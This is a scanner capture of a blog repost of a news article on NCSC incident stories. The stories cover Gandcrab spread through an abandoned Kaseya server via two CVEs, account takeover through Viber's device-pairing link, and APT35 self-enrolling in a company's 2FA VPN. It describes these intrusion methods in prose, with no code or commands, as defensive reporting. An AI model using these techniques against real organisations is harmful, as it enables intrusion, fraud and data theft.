blog.extremehacking.org
Open in
urlscan Pro
43.225.55.205
Public Scan
URL:
http://blog.extremehacking.org/blog/2019/04/30/powershell-the-gandcrab-infection-and-the-long-forgotten-server/
Submission: On April 27 via api from US — Scanned from DE
Submission: On April 27 via api from US — Scanned from DE
Form analysis 3 forms found in the DOM
GET http://blog.extremehacking.org/
<form role="search" class="searchform" method="get" action="http://blog.extremehacking.org/">
<div class="search-table">
<div class="search-field">
<input type="text" value="" name="s" class="s" placeholder="Search ...">
</div>
<div class="search-button">
<input type="submit" class="searchsubmit" value="">
</div>
</div>
</form>GET http://blog.extremehacking.org/
<form role="search" class="searchform" method="get" action="http://blog.extremehacking.org/">
<div class="search-table">
<div class="search-field">
<input type="text" value="" name="s" class="s" placeholder="Search ...">
</div>
<div class="search-button">
<input type="submit" class="searchsubmit" value="">
</div>
</div>
</form>GET http://blog.extremehacking.org/
<form role="search" class="searchform" method="get" action="http://blog.extremehacking.org/">
<div class="search-table">
<div class="search-field">
<input type="text" value="" name="s" class="s" placeholder="Search ...">
</div>
<div class="search-button">
<input type="submit" class="searchsubmit" value="">
</div>
</div>
</form>Text Content
Extreme Hacking Blog | Cyber Suraksha Abhiyan|sadik.shaikh@extremehacking.org * Hackers Charity * Main Website * Cyber News * Exploits * White Papers * Google Hacking Database * Go to... * Hackers Charity * Main Website * Cyber News * Exploits * White Papers * Google Hacking Database POWERSHELL, THE GANDCRAB INFECTION AND THE LONG-FORGOTTEN SERVER Home/Cyber News/Powershell, the Gandcrab infection and the long-forgotten server Previous Next Powershell, the Gandcrab infection and the long-forgotten server Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: The Register CyberUK 2019 If your hair isn’t already grey enough, GCHQ staff have revealed a handful of infosec incidents that, in their words, “surprised us”. During a talk at CyberUK 2019, the annual shindig of the spy agency’s public-facing offshoot, the National Cyber Security Centre (NCSC), a bespectacled and bearded chap who was introduced only as “Toby L” told an enthralled audience one of his “favourite war stories”. The NCSC is part of GCHQ’s drive since 2013 to rebuild public trust and convince industry that the government is also interested in their economic wellbeing. As part of that, NCSC occasionally gets called in to help with particularly pernickety problems involving malware infections on corporate networks. “This specific instance of Gandcrab was not the most exciting,” said “Toby”. “It’s ransomware that’s relatively well-understood in the community. It’s relatively easy to recover from one of those compromises. It’s not the ransomware that’s interesting, though, but how it got where it was.” A look over the company’s logs revealed that Gandcrab had been introduced via a download from Pastebin – an encoded Base64 binary summoned through a Powershell command, no less. “Base64 on Powershell is a perfectly legit function. It provides a mechanism to run your Powershell scripts without a dedicated commandlet or a dedicated script file,” commented Toby. “It does look pretty weird and dodgy when you’ve got encoded commands being sent to Powershell but it’s a legitimate use of it.” What ran Powershell, then? NCSC traced that back to a file called agentmon.exe – and this was where it got interesting. “It’s a legit file from Kaseya, an IT vendor. They sell products that allow remote management monitoring. If you have an outsourced IT vendor managing your network remotely from their office somewhere in the world, chances are they use a tool like Kaseya. They log into your network, access controls on RDP [remote desktop], SSH, whatever you might be using. Coming in through a backdoor if you like, a custom protocol.” Agentmon.exe was running on that particular network with system-level privs, deploying Powershell commands across it daily – “adding to the noise ratio a bit”, as Toby put it. Digging into Kaseya’s logs revealed something even more intriguing: the server issuing the commands had been run by an outsourced IT provider, and that provider’s contract with the infected company had ended quite a while ago. CVE-2017-18362 explained half the story. The critical vuln allows anyone with access to the Kaseya server’s ManagedIT.asmx page through its web interface to execute arbitrary SQL queries. As Toby put it: “No whitelisting, no blacklisting, no password entry… send SQL commands and HTTP POST and it’ll just run it.” But Powershell? Easy if you know about CVE-2018-20753, which allows (yup, you guessed it) unprivileged remote attackers to execute Powershell payloads on all managed devices. When the external MSP’s contract had ended, post-contract cleanup by both parties hadn’t included the Kaseya deployment on all the devices across the network. Left unpatched, unoperated and unremembered, the Kaseya server had been found by a baddie who’d made use of two relatively old CVEs to compromise the entire network and distribute ransomware across it. “One of those weird tech issues,” shrugged Toby. MALWARELESS MALIGNANCY Another NCSC bod, “Harry W”, as equally descript as his colleague Toby, took to the podium. An executive at a company got a WhatsApp invite to a conference call from a personal assistant. After establishing comms, the PA said: “We use Viber [another cross-platform VoIP app] now.” “It’s a legitimate product,” said Harry. “A perfectly fine messaging platform.” The PA sent the exec a crafted link. But this was no URL made up of dodgy ASCII lookalike characters, or substituting 1 for I, or even to a suspect domain. This was a URL to viber.com/activate-secondary/[string of random characters]. “Activate secondary is a very specific feature of Viber,” said Harry. “It allows you to sync your Viber accounts on one device with another; for example, a desktop. You can sync messages between different systems. Make phone calls off one and send messages off the other. Enables users to use it a bit more flexibly.” A useful feature, then. For both good and bad users. “What we saw was a number of individuals in this organisation who did click this link,” said Harry. “They would activate secondary, paired their device with another – I think it was on the African continent somewhere. What happens? Full address book popped over. Not just the Viber address book; the entire address book on the phone. You might have personal info on there about job titles. Makes the next pivot for social engineering that bit easier.” It gets worse. “If you’ve paired your device, it also allows you to spoof phone calls as the person you’ve just synced with,” revealed Harry. “The attacker can now use your caller ID. If you’ve got a credit card synced, you can make Viber-to-landline calls – much more lucrative! You can also, rather than just ringing friends, ring your own 091 hotline number to bring in extra money.” “Malwareless,” he continued. “It wasn’t using anything particularly sophisticated, but still, a really interesting channel in which they were trying to get that extra information from targets.” As he pointed out, no mobile device management platform would have picked up this attack; Viber is a legitimate messaging app present in the various app stores. “Again, when you’ve got legit functions from an app, how can you monitor and detect those?” SECURITY LOCKING OUT YOUR ATTACK? NEVER MIND – JUST ENROL FOR A COMPANY VPN Another cautionary tale came from an attack by Iran-based hacking crew APT35, aka “Newscaster”. The targeted company had been hit a couple of months previously. Diligently, the firm did all the right things: beefed up security, briefed non-techie staff on things to do and not to do, and the rest of it. All exactly by the book. Except for their VPN implementation. Users across the company were told to register for access to the new company-wide VPN. No VPN, no access to business-critical stuff. The VPN itself was protected by 2FA. “What they had missed out was the enrolment to the 2FA VPN authentication was initiated by the users,” said the NCSC bod. “Not all users, particularly those based in offices, need 2FA. So they didn’t enrol, right? All the [threat] actor did was target a bunch of accounts, figure out a user who wasn’t enrolled and then enrolled themselves instead.” The hackers were literally signing themselves up to the new access-all-areas corporate VPN. They were eventually discovered and shut out again, but not before they had gained access to a critical proof-of-concept deployment where access had been locked down to just four specific accounts. -------------------------------------------------------------------------------- As well as telling some fascinating stories, the point of this session was a bit wider: NCSC, even as an arm of GCHQ, is getting out there and helping industry with its infosec headaches. While some chunks of industry will doubtless need a lot more convincing than this to give people from a state spy agency access to their sensitive internal networks, it’s a real shift from the days of 2013 and the Snowden revelations. WWW.EXTREMEHACKING.ORG SADIK SHAIKH | CYBER SURAKSHA ABHIYAN, ETHICAL HACKING TRAINING INSTITUTE, CEHV10,CHFI,ECSAV10,CAST,ENSA, CCNA, CCNA SECURITY,MCITP,RHCE,CHECKPOINT, ASA FIREWALL,VMWARE,CLOUD,ANDROID,IPHONE,NETWORKING HARDWARE,TRAINING INSTITUTE IN PUNE, CERTIFIED ETHICAL HACKING,CENTER FOR ADVANCED SECURITY TRAINING IN INDIA, CEH V10 COURSE IN PUNE-INDIA, CEH CERTIFICATION IN PUNE-INDIA, CEH V10 TRAINING IN PUNE-INDIA, ETHICAL HACKING COURSE IN PUNE-INDIA By Sadik Shaikh|2019-04-30T09:53:31+00:00April 30th, 2019|Cyber News| SHARE THIS STORY, CHOOSE YOUR PLATFORM! RECENT POSTS * Houston consulate one of worst offenders in Chinese espionage, say U.S. officials * Shocked I am. Shocked to find that underground bank-card-trading forums are full of liars, cheats, small-time grifters * Vint Cerf suggests GDPR could hurt coronavirus vaccine development * Brit defense contractor hacked, up to 100,000 past and present employees’ details siphoned off – report * US officially warns China is launching cyberattacks to steal coronavirus research ARCHIVES * July 2020 * May 2020 * November 2019 * September 2019 * August 2019 * July 2019 * June 2019 * May 2019 * April 2019 * March 2019 * February 2019 * January 2019 * December 2018 * November 2018 * October 2018 * September 2018 * August 2018 * July 2018 * June 2018 * May 2018 * April 2018 * March 2018 * February 2018 * January 2018 * December 2017 * November 2017 * October 2017 * September 2017 * August 2017 * July 2017 * June 2017 * May 2017 * April 2017 * March 2017 * February 2017 * January 2017 * December 2016 * November 2016 * October 2016 * September 2016 * August 2016 * July 2016 * June 2016 * May 2016 * April 2016 * March 2016 * February 2016 * January 2016 * December 2015 * November 2015 * October 2015 * September 2015 * August 2015 * July 2015 * June 2015 CATEGORIES * Big Billion Days * CYBER CRIME HELPLINE * CYBER CRIME HELPLINE AWARD * Cyber News * Exploits * Files containing juicy info * Files containing passwords * Google Hacking Database * Hackers Charity * Hacking * job * Metasploit * NSA Hacked * Papers * Pokemon Go Hacks and Tricks * Reliance Jio 4G Services * Sensitive Directories * torrentz * torrentz.eu is back * Tracking Proxy IP * Uncategorized * White Papers * XPath Injection PAGES * Hackers Charity * Main Website * Cyber News * Exploits * White Papers * Google Hacking Database EXTREME HACKING CYBER SURAKSHA ABHIYAN Email: sadik.shaikh@extremehacking.org Web: Cyber Suraksha Abhiyan April 2019 M T W T F S S 1234567 891011121314 15161718192021 22232425262728 2930 « Mar May » OUR BELIEF… "One machine can do the work of fifty ordinary men. No machine can do the work of one extraordinary man." Copyright 2015 Extreme Hacking | All Rights Reserved | Cyber Suraksha Abhiyan | Site Protected by Sadik Shaikh | ShareThis Copy and Paste